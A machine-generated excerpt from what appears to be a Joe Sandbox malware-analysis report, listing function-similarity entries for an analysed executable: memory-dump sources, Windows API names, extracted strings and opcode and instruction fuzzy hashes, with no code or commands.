                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                                            • String ID:
                                                                            • API String ID: 3215588206-0
                                                                            • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                            • Instruction ID: 214a1ce746f274d29011475a06d4725408203e8fa1397445cc23f664d3e127d0
                                                                            • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                            • Instruction Fuzzy Hash: 65515E32B0CB028AEB54AB74E85957D77A1EF48784F944439DA0E83B84DF7CE4668354
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 281475176-2761157908
                                                                            • Opcode ID: 3ce6d098dea06b582cd2cb2e4a3c36d83b3aa6360c3263b8f2a886e09f514321
                                                                            • Instruction ID: 0fcf42dd37fd44e562afc4a02be0ec97ce4c11460c24bebe2b805ed86890b7cb
                                                                            • Opcode Fuzzy Hash: 3ce6d098dea06b582cd2cb2e4a3c36d83b3aa6360c3263b8f2a886e09f514321
                                                                            • Instruction Fuzzy Hash: 94B2F872B082828BE7759E35D440EFDBB91FB447C8F905135DA0A9BB84DF38E5968B10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: P
                                                                            • API String ID: 0-3110715001
                                                                            • Opcode ID: e72118c0d96e0102c5b40f29b553151352ee296625f047164934555310371132
                                                                            • Instruction ID: 0bbb12137225edfb373cf0527631d373cd464f1a06e2c27fb450e807436fbaf6
                                                                            • Opcode Fuzzy Hash: e72118c0d96e0102c5b40f29b553151352ee296625f047164934555310371132
                                                                            • Instruction Fuzzy Hash: 1CA18C32A0864186E734EF39D414AAABB64FF847C8F908135DA9A47B94CF7CE596C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                            • String ID: -$:$:$?
                                                                            • API String ID: 3440502458-92861585
                                                                            • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                            • Instruction ID: 5ba17d45c2fc670f626080f85ccc6d32f0eee91e5ccd6efb1a309726aa0ef4b1
                                                                            • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                            • Instruction Fuzzy Hash: 2EE10832B0864245E770EF319841A79AFA5FB847D4FD45131EA4E4AB85DF3CD4A38720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                            • API String ID: 3232708057-3289030164
                                                                            • Opcode ID: 814f0e17d8d2bbad75fd670c3d6fe38e01099dff03db83368ac82057212a78ab
                                                                            • Instruction ID: 0a8dbfe87780b344b01e3b83625abda49224d2817e6b31f8c46b2541b7816b50
                                                                            • Opcode Fuzzy Hash: 814f0e17d8d2bbad75fd670c3d6fe38e01099dff03db83368ac82057212a78ab
                                                                            • Instruction Fuzzy Hash: D9D1A162B18A5295EB20FB75D8418FEAB61FB847D4FC00032EA4D47A99DF7CD51AC720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1409584000-438819550
                                                                            • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                            • Instruction ID: ae4c6fa9b20c4174beb22cc2c74323642d2b937aaeee61890f1c149929adb2ab
                                                                            • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                            • Instruction Fuzzy Hash: 2141602161864294EB20BB35E849AB9EBA1FF45BE4FC45131DD6E436A4DF3CE41BC321
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: SendString
                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                            • API String ID: 890592661-1007645807
                                                                            • Opcode ID: 8c75045ae2975b650199124e41f521ffa5447aaf8d5604ea34d6cf9b552b621e
                                                                            • Instruction ID: fcc3de052f5b2f0dd76dae20f33824133cb6c8db67e517b84b2e76533ead81d4
                                                                            • Opcode Fuzzy Hash: 8c75045ae2975b650199124e41f521ffa5447aaf8d5604ea34d6cf9b552b621e
                                                                            • Instruction Fuzzy Hash: C1212122A1855391E730FB34E895E6AAB71FF94788FC44031E94D43999DF2CD51BC760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: c617befc0bd1dbd4d54129b7722c2ebd01a7f232fb97f78571421a33ec3567e4
                                                                            • Instruction ID: 0418997685a70be0a48e87da06cb2a6ded8544be1f64b699a31962a06b522d62
                                                                            • Opcode Fuzzy Hash: c617befc0bd1dbd4d54129b7722c2ebd01a7f232fb97f78571421a33ec3567e4
                                                                            • Instruction Fuzzy Hash: CC710712A0C6C285FB39AB309410AB9AF61EF95FC4FD80039D68D03682CE6DD967D735
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 2640511053-438819550
                                                                            • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                            • Instruction ID: 6098d5dec4807789320215c2e3e1b40e59dab88a7d4dae150e0a6f349337933e
                                                                            • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                            • Instruction Fuzzy Hash: 8E41A061A0CA42A4EA20BB35A844AB9EB91FF45BE4FC05131DD6E436D5DF3CD41BC721
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3218304859-0
                                                                            • Opcode ID: 09c3fed73910027fa3b0afc734d155082cf1a3e3b474a6a11520eee8132cf2aa
                                                                            • Instruction ID: 8fd941edbc1556a3868ea0122182ae45a7b82883eeca16b6571627ec7778eebd
                                                                            • Opcode Fuzzy Hash: 09c3fed73910027fa3b0afc734d155082cf1a3e3b474a6a11520eee8132cf2aa
                                                                            • Instruction Fuzzy Hash: 75F17032B15A4286EB20EF76D490ABCBB60FB84BD8B858131DE4D47B95DF38D022C754
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2762341140-0
                                                                            • Opcode ID: 8a837895ffe9a100d7aefc3d06cde3847c66688097cc961de40736a6c7541cdd
                                                                            • Instruction ID: c5c7b0a5858220408b1e9cd64bba803187cc0996b762d7132ef2e888ba462da0
                                                                            • Opcode Fuzzy Hash: 8a837895ffe9a100d7aefc3d06cde3847c66688097cc961de40736a6c7541cdd
                                                                            • Instruction Fuzzy Hash: 54C15A76B04B4185EB20EF3AE8846ADABA0FB88BD4F854036DE4E47725DF38D456C750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 1255039815-0
                                                                            • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                            • Instruction ID: 8242be3fdcf917ab0f6ce36653826a442960a7d3e88736b889b7c9f78e5efaf8
                                                                            • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                            • Instruction Fuzzy Hash: DB619022B046518AEB20EF72D8489AD7BB4FF44BC8B844435DE4E53794DF39E956C360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: b613241afe3ad8578923ea3e9f1846ed3b3a73b4f0a87d0067d7f4c10d8347cf
                                                                            • Instruction ID: 652e31258b39363a6870e6a02d19690edd49ef07001f850598f277c5833a7bf4
                                                                            • Opcode Fuzzy Hash: b613241afe3ad8578923ea3e9f1846ed3b3a73b4f0a87d0067d7f4c10d8347cf
                                                                            • Instruction Fuzzy Hash: 39718E36605A8285E720EF65D884AEDAB60FB88BD4F904032DE5D47BA4CF3CD597C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 4047182710-1173974218
                                                                            • Opcode ID: 8afc811527fb99e201d68577d1b03bd085c91ade47ff6067ade4f5a0ec4c1327
                                                                            • Instruction ID: 57e786e727ece0ce783f317be0f162925d4574641f9bc2da0efd774a348dbadc
                                                                            • Opcode Fuzzy Hash: 8afc811527fb99e201d68577d1b03bd085c91ade47ff6067ade4f5a0ec4c1327
                                                                            • Instruction Fuzzy Hash: EF817422A0864295EB20FB75E4419EDAF64EF943D4FC40032EA4E475A9EF7CD557C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                            • String ID: ?
                                                                            • API String ID: 500310315-1684325040
                                                                            • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                            • Instruction ID: fae8d30a5c3557d354b6f3c68a6c3cbce29c5cb5da29ac22eabe04c2a350d7df
                                                                            • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                            • Instruction Fuzzy Hash: 66617132A096528AE730EF31D940979BBA5EF847D4FD40135E94E4AB94DF3CE4A2C760
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                                            • String ID:
                                                                            • API String ID: 540024437-0
                                                                            • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                            • Instruction ID: b4cb5c1ac408bdb18df92459a788ffb3e5a889d014b255105c5d73b29f3e8c0b
                                                                            • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                            • Instruction Fuzzy Hash: 88418061B0865286EB20FF3A944167CAB60FF85BE0F884530DA5E47B92CF7CD1678754
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 61f0d80c1719e9fabf86412dc02edfd1a0dcbac5588a2bff5cf71fb0c458328a
                                                                            • Instruction ID: 33d82933180e2cf8aa09149fb72e88cb233690a20ef217872cb5a05c25367115
                                                                            • Opcode Fuzzy Hash: 61f0d80c1719e9fabf86412dc02edfd1a0dcbac5588a2bff5cf71fb0c458328a
                                                                            • Instruction Fuzzy Hash: 8CE1C436A08B829AEB20EF35D4406ADBBA0FB84798F844136DE4D47B54DF3CE556C714
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: eac801da271dad5c3dedbffc09f324b1d2ee4d57e9dbd9d9ebf402661b424a02
                                                                            • Instruction ID: af757919c5d5901a18b34229b719558f9cfac1a847b7d4cbbffe7c1a4d0783bc
                                                                            • Opcode Fuzzy Hash: eac801da271dad5c3dedbffc09f324b1d2ee4d57e9dbd9d9ebf402661b424a02
                                                                            • Instruction Fuzzy Hash: C341B322A28A4292EA60FB34E8449EDEB64FF907D4FD01131EA5E07695EF7CD517C720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 1239891234-0
                                                                            • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                            • Instruction ID: d591049bbf6a0de5dec3c69abe4df4e41e1bd0fa1d60e7c3963628792830aa7c
                                                                            • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                            • Instruction Fuzzy Hash: 27316336608F8196DB70EF35E8406AEBBA4FB84794F900135EA9D47B58EF3CC5568B10
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
